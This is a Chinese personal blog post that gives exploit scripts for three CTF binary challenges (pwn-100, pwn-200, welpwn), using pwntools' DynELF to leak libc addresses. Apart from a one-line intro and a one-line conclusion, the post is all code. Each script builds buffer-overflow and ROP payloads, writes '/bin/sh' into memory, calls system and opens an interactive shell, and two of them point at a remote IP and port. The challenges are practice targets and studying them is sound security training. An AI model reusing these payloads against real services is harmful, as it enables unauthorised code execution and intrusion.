pwn libc之Dynelf


阅读数: 次   
字数统计: 928字   |   阅读时长: 5分

pwn-100
pwn-200
welpwn

@TOC

Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是”/bin/sh”的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取”/bin/sh”

pwn-100

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="amd64", log_level="debug")
contentt = 1

#elf
elf=ELF("pwn-100")
puts_plt=elf.plt['puts']
read_got=elf.got['read']
main_addr=0x400550#0x4006b8
pop_rdi=0x400763
ret_addr=0x4004e1

binsh_addr=0x601040

#csu
pop6_addr=0x40075A
mov3_addr=0x400740
offset=0x48


def leak(addr):
    up=b''
    content=b''
    payload=b'a'*(0x40+8)+p64(pop_rdi)+p64(addr)+p64(puts_plt)+p64(main_addr)
    payload=payload.ljust(200,b'b')
    io.send(payload)
    io.recvuntil("bye~\n")
    while True:
        chr=io.recv(numb=1,timeout=0.1)
        if up == b'\n' and chr == b"":
            content=content[:-1]+b'\x00'
            break
        else:
            content+=chr
            up=chr
    content=content[:4]
    return content

def csu(r12,r13,r14,r15,ret):
    payload =b'a'*offset
    payload+=p64(pop6_addr)
    payload+=p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(mov3_addr)
    payload+=b'a'*(56)
    payload+=p64(ret)
    payload=payload.ljust(200,b'b')
    io.send(payload)
    sleep(1)

def main():
    global io
    if contentt == 0:
        io = process("./pwn-100")
    else:
        io = remote("111.200.241.244",52889)
    #leak
    dynelf=DynELF(leak,elf=elf)
    sys_addr=dynelf.lookup("system",'libc')
    print(sys_addr)
    #write
    csu(read_got,8,binsh_addr,0,main_addr)
    io.recvuntil("bye~\n")
    io.send(b'/bin/sh\x00')
    #getshell
    payload=b'a'*offset+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
    payload=payload.ljust(200,b'b')
    io.send(payload)
    io.interactive()
main()

pwn-200

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="i386", log_level="debug")
content = 1

#elf
elf=ELF("pwn-200")
write_plt=elf.plt['write']
read_plt=elf.plt['read']
#read_got=elf.got['read']
pop3_addr=0x80485cd
start_addr=0x80483D0
sub_addr=0x8048484
binsh_addr=0x804a000
offset=0x6c+4

def leak(addr):
    payload =b'a'*offset
    payload+=p32(write_plt)+p32(sub_addr)+p32(1)+p32(addr)+p32(4)   #cs
    io.send(payload)
    s=io.recv(4)
    return s

def main():
    global io
    if content == 0:
        io = process("./pwn-200")
    else:
        io = remote("111.200.241.244",49433)

    io.recv()
    #leak
    dynelf=DynELF(leak,elf=elf)
    sys_addr=dynelf.lookup("system",'libc')
    print(b'#' * (10))
    #
    payload=b'a'*offset+p32(start_addr)
    io.send(payload)
    io.recv()
    #write
    payload=b'a'*offset+p32(read_plt)+p32(pop3_addr)+p32(0)+p32(binsh_addr)+p32(8)+p32(sys_addr)+p32(sub_addr)+p32(binsh_addr)
    #+p32(sub_addr)
    io.send(payload)
    io.send(b'/bin/sh\x00')
    #getshell p32(pop3_addr)+
    #payload=b'a'*offset+p32(sys_addr)+p32(sub_addr)+p32(binsh_addr)
    #print(sys_addr)
    #io.send(payload)
    io.interactive()
main()

welpwn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/env python3
from pwn import *
from LibcSearcher import *

io = process("./welpwn")
context.log_level = 'debug'
elf = ELF("welpwn")

addr_pop4 = 0x40089c
addr_pop_rdi = 0x4008a3

io.recvuntil("Welcome to RCTF\n")

payload = b'A' * 24 + p64(addr_pop4) + p64(addr_pop_rdi) + p64(elf.got['write']) + p64(elf.symbols['puts']) + p64(
    elf.symbols['main'])
io.sendline(payload)
io.recvuntil(b'\x40')
addr_write = io.recv(6)
addr_write = u64(addr_write.ljust(8, b'\x00'))
print (hex(addr_write))

#libc = LibcSearcher('write', addr_write)
addr_base = addr_write - 	0x0eef20
addr_sys = addr_base + 	0x048e50
addr_sh = addr_base + 	0x18a156

payload = b'A' * 24 + p64(addr_pop4) + p64(addr_pop_rdi) + p64(addr_sh) + p64(addr_sys)
io.sendline(payload)

io.interactive()
'''也不知道自己写的用Dynelf哪里错了
from pwn import *

context(os="linux", arch="amd64", log_level="debug")
content = 0

#elf
elf=ELF("welpwn")
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']
main_addr=0x0400630
binsh_addr=0x601000
pop_rdi=0x0804856d
#csu
offset=0x18
pop6_addr=0x40089A
mov3_addr=0x400880

def csu(r12,r13,r14,r15,ret):
    payload =b'a'*offset
    payload+=p64(pop6_addr)+p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=b'a'*56
    payload+=p64(ret)
    payload=payload.ljust(1024,b'b')
    io.send(payload)
    sleep(1)

def leak(addr):
    io.recv(1024)
    io.recvuntil("Welcome to RCTF\n")
    csu(write_got,8,addr,1,main_addr)

    s=io.recv(8)
    return s

def main():
    global io
    if content == 0:
        io = process("./welpwn")
    else:
        io = remote("")
    #leak
    dynelf=DynELF(leak,elf=elf)
    sys_addr=dynelf.lookup('system','libc')
    print(sys_addr)
    io.recvuntil("Welcome to RCTF\n")
    #write
    csu(read_got,8,binsh_addr,0,main_addr)
    io.recvline()
    io.send(b'/bin/sh\x00')
    #getshell
    io.recvuntil("Welcome to RCTF\n")
    payload=b'a'*offset+p64(pop_rdi)+p64(binsh_addr)+p64(binsh_addr)+p64(sys_addr)
    io.send(payload)
    io.interactive()
main()
'''

总结:能不用Dynelf,就不用。。。。老是在一些地方出错,实在查不到libc再用。



-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791